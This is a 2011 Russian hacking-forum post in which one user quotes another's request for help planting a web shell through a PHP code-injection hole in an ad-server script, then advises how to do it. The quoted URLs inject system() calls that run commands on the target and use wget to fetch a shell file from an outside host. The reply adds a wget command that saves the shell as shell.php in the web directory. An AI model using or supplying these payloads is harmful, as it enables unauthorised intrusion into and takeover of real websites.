Показать сообщение отдельно

  #26  
Старый 15.12.2011, 23:25
FlooP1k
Познающий
Регистрация: 28.07.2010
Сообщений: 91
С нами: 8311286

Репутация: 48
По умолчанию

Цитата:
Сообщение от nevermore  
Помогите с заливкой шелла. Нашел данную уязвимость.
Код:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la
выполняется
Код:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget
выполняется
Код:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt
не выполняется
пробовал аналогично и fetch, и curl - не хочет заливать.
также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.
Как залить шелл?
может там нет права на запись? ну или попробуй:

wget http://sait.ru/shell.txt -O /home/polniu put' do papki/shell.php

Пусть можно легко узнать с помощью pwd
 
Ответить с цитированием